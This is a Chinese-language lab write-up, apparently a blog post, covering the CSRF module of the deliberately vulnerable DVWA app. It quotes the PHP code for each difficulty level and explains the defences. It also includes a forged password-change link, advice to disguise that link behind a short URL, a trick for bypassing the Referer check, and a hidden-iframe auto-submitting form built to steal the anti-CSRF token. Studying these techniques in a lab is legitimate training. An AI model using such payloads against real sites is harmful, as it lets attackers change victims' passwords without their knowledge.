DVWA筆記之CSRF

CSRF,全稱Cross-site request forgery,翻譯過來就是跨站請(qǐng)求偽造,是指利用受害者尚未失效的身份認(rèn)證信息(cookie、會(huì)話等),誘騙其點(diǎn)擊惡意鏈接或者訪問包含攻擊代碼的頁面,在受害人不知情的情況下以受害者的身份向(身份認(rèn)證信息所對(duì)應(yīng)的)服務(wù)器發(fā)送請(qǐng)求,從而完成非法操作(如轉(zhuǎn)賬、改密等)。CSRF與XSS最大的區(qū)別就在于,CSRF并沒有盜取cookie而是直接利用。

low服務(wù)端代碼

<?php 

if( isset( $_GET[ 'Change' ] ) ) { 
    // Get input 
    $pass_new  = $_GET[ 'password_new' ]; 
    $pass_conf = $_GET[ 'password_conf' ]; 

    // Do the passwords match? 
    if( $pass_new == $pass_conf ) { 
        // They do! 
        $pass_new = mysql_real_escape_string( $pass_new ); 
        $pass_new = md5( $pass_new ); 

        // Update the database 
        $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';"; 
        $result = mysql_query( $insert ) or die( '<pre>' . mysql_error() . '</pre>' ); 

        // Feedback for the user 
        echo "<pre>Password Changed.</pre>"; 
    } 
    else { 
        // Issue with passwords matching 
        echo "<pre>Passwords did not match.</pre>"; 
    } 
    mysql_close(); 
} 

?>

思路:直接構(gòu)造鏈接就可以:
http://.../dvwa/vulnerabilities/csrf/?password_new=PASSWORD&password_conf=PASSWORD&Change=Change#
不完美的話再去轉(zhuǎn)成短地址就看不出來了。還可以在公網(wǎng)上傳一個(gè)攻擊頁面,誘騙受害者去訪問。

medium服務(wù)端代碼

<?php 

if( isset( $_GET[ 'Change' ] ) ) { 
    // Checks to see where the request came from 
    if( eregi( $_SERVER[ 'SERVER_NAME' ], $_SERVER[ 'HTTP_REFERER' ] ) ) { 
        // Get input 
        $pass_new  = $_GET[ 'password_new' ]; 
        $pass_conf = $_GET[ 'password_conf' ]; 

        // Do the passwords match? 
        if( $pass_new == $pass_conf ) { 
            // They do! 
            $pass_new = mysql_real_escape_string( $pass_new ); 
            $pass_new = md5( $pass_new ); 

            // Update the database 
            $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';"; 
            $result = mysql_query( $insert ) or die( '<pre>' . mysql_error() . '</pre>' ); 

            // Feedback for the user 
            echo "<pre>Password Changed.</pre>"; 
        } 
        else { 
            // Issue with passwords matching 
            echo "<pre>Passwords did not match.</pre>"; 
        } 
    } 
    else { 
        // Didn't come from a trusted source 
        echo "<pre>That request didn't look correct.</pre>"; 
    } 

    mysql_close(); 
} 
?>

相關(guān)函數(shù)說明

int eregi(string pattern, string string)

檢查string中是否含有pattern(不區(qū)分大小寫),如果有返回True,反之False。

可以看到,Medium級(jí)別的代碼檢查了保留變量 HTTP_REFERER(http包頭的Referer參數(shù)的值,表示來源地址)中是否包含SERVER_NAME(http包頭的Host參數(shù),及要訪問的主機(jī)名)。
因?yàn)槭莚eferer值包含主機(jī)名,所以可以將攻擊頁面名稱改為"主機(jī).html"。

High服務(wù)端代碼:

<?php 

if( isset( $_GET[ 'Change' ] ) ) { 
    // Check Anti-CSRF token 
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); 

    // Get input 
    $pass_new  = $_GET[ 'password_new' ]; 
    $pass_conf = $_GET[ 'password_conf' ]; 

    // Do the passwords match? 
    if( $pass_new == $pass_conf ) { 
        // They do! 
        $pass_new = mysql_real_escape_string( $pass_new ); 
        $pass_new = md5( $pass_new ); 

        // Update the database 
        $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';"; 
        $result = mysql_query( $insert ) or die( '<pre>' . mysql_error() . '</pre>' ); 

        // Feedback for the user 
        echo "<pre>Password Changed.</pre>"; 
    } 
    else { 
        // Issue with passwords matching 
        echo "<pre>Passwords did not match.</pre>"; 
    } 

    mysql_close(); 
} 

// Generate Anti-CSRF token 
generateSessionToken(); 

?>

可以看到,High級(jí)別的代碼加入了Anti-CSRF token機(jī)制,用戶每次訪問改密頁面時(shí),服務(wù)器會(huì)返回一個(gè)隨機(jī)的token,向服務(wù)器發(fā)起請(qǐng)求時(shí),需要提交token參數(shù),而服務(wù)器在收到請(qǐng)求時(shí),會(huì)優(yōu)先檢查token,只有token正確,才會(huì)處理客戶端的請(qǐng)求。
寫個(gè)腳本,獲取token。

<script type="text/javascript">
    function attack()
    {
        document.write(document.getElementById("hack").contentWindow.document.getElementsByName('user_token')[0].value);
        document.getElementsByName('user_token')[0].value=document.getElementById("hack").contentWindow.document.getElementsByName('user_token')[0].value;
        document.getElementById("transfer").submit();
    }
</script>

<iframe src="http://*.*.*.*/dvwa/vulnerabilities/csrf" id="hack" border="0" style="display: none;"></iframe>

<body onload="attack()">
    <form method="GET" id="transfer" action="http://*.*.*.*/dvwa/vulnerabilities/csrf">
        <input type="hidden" name="password_new" value="password">
        <input type="hidden" name="password_conf" value="password">
        <input type="hidden" name="user_token" value="">
        <input type="hidden" name="Change" value="Change">
    </form>
</body>

但是跨域請(qǐng)求卡住了,只能通過注入獲取token再進(jìn)行csrf。

impossible
服務(wù)端代碼:

<?php 

if( isset( $_GET[ 'Change' ] ) ) { 
    // Check Anti-CSRF token 
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); 

    // Get input 
    $pass_curr = $_GET[ 'password_current' ]; 
    $pass_new  = $_GET[ 'password_new' ]; 
    $pass_conf = $_GET[ 'password_conf' ]; 

    // Sanitise current password input 
    $pass_curr = stripslashes( $pass_curr ); 
    $pass_curr = mysql_real_escape_string( $pass_curr ); 
    $pass_curr = md5( $pass_curr ); 

    // Check that the current password is correct 
    $data = $db->prepare( 'SELECT password FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' ); 
    $data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR ); 
    $data->bindParam( ':password', $pass_curr, PDO::PARAM_STR ); 
    $data->execute(); 

    // Do both new passwords match and does the current password match the user? 
    if( ( $pass_new == $pass_conf ) && ( $data->rowCount() == 1 ) ) { 
        // It does! 
        $pass_new = stripslashes( $pass_new ); 
        $pass_new = mysql_real_escape_string( $pass_new ); 
        $pass_new = md5( $pass_new ); 

        // Update database with new password 
        $data = $db->prepare( 'UPDATE users SET password = (:password) WHERE user = (:user);' ); 
        $data->bindParam( ':password', $pass_new, PDO::PARAM_STR ); 
        $data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR ); 
        $data->execute(); 

        // Feedback for the user 
        echo "<pre>Password Changed.</pre>"; 
    } 
    else { 
        // Issue with passwords matching 
        echo "<pre>Passwords did not match or current password incorrect.</pre>"; 
    } 
} 

// Generate Anti-CSRF token 
generateSessionToken(); 

?>

Impossible級(jí)別的代碼利用PDO技術(shù)防御SQL注入,并且要原始密碼,攻擊者在不知道原始密碼的情況下,無論如何都無法進(jìn)行CSRF。攻擊。

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容